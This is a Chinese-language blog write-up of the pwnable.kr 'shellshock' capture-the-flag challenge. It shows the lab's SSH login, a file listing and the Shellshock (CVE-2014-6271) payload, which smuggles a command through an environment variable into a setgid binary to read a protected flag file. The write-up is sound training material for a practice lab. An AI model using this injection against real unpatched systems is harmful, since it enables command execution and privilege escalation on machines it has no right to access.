ycdxsb CTF / pwn / pwnable.kr / Toddler'sBottle1 分钟 读完 (大约 205 个字)  0次访问

pwnable.kr —— shellshock

question#

1
2
3
4
5
Mommy, there was a shocking news about bash.
I bet you already know, but lets just make it sure :)


ssh shellshock@pwnable.kr -p2222 (pw:guest)

题目要求我们使用ssh登录到服务器上ssh shellshock@pwnable.kr -p2222,密码是guest,有的时候可能有身份的校验,这个时候需要加上参数-o StrictHostKeyChecking=no进行登录

analyse#

题目里说了是利用shellshcok漏洞

1
2
3
4
5
6
shellshock@ubuntu:~$ ls -lth
total 960K
-r-xr-sr-x 1 root shellshock_pwn 8.4K Oct 12  2014 shellshock
-r--r--r-- 1 root root            188 Oct 12  2014 shellshock.c
-r--r----- 1 root shellshock_pwn   47 Oct 12  2014 flag
-r-xr-xr-x 1 root shellshock     937K Oct 12  2014 bash

权限如上,用shellshock的POC看下是否存在漏洞

1
2
3
shellshock@ubuntu:~$ env x='() { :;}; echo vulnerable' ./bash -c "echo test"
vulnerable
test

说明存在

get flag#

1
2
3
shellshock@ubuntu:~$ env x='() { :;}; bash -c "cat flag"' ./shellshock 
only if I knew CVE-2014-6271 ten years ago..!!
Segmentation fault

flagonly if I knew CVE-2014-6271 ten years ago..!!

#

喜欢这篇文章?打赏一下作者吧

评论

关注我

链接

归档

订阅更新

邮件订阅,更新早知道

分类

最新文章

标签

AI2
CTF48
CVE4
Fuzz1
FuzzingBook1
HEVD5
NLP1
PyQt512
ROP Emporium2
Toddler's Bottle21
Web1
automatic analyse10
binary analyse1
codeql5
crypto7
fuzz3
life2
linux kernel2
machine learning1
mobile security1
others1
paper18
pentest3
pwn24
pwnable.kr21
re5
research20
security18
security situation awareness2
stack overflow3
tools2
windows8
work1
writeup5
数据库11
×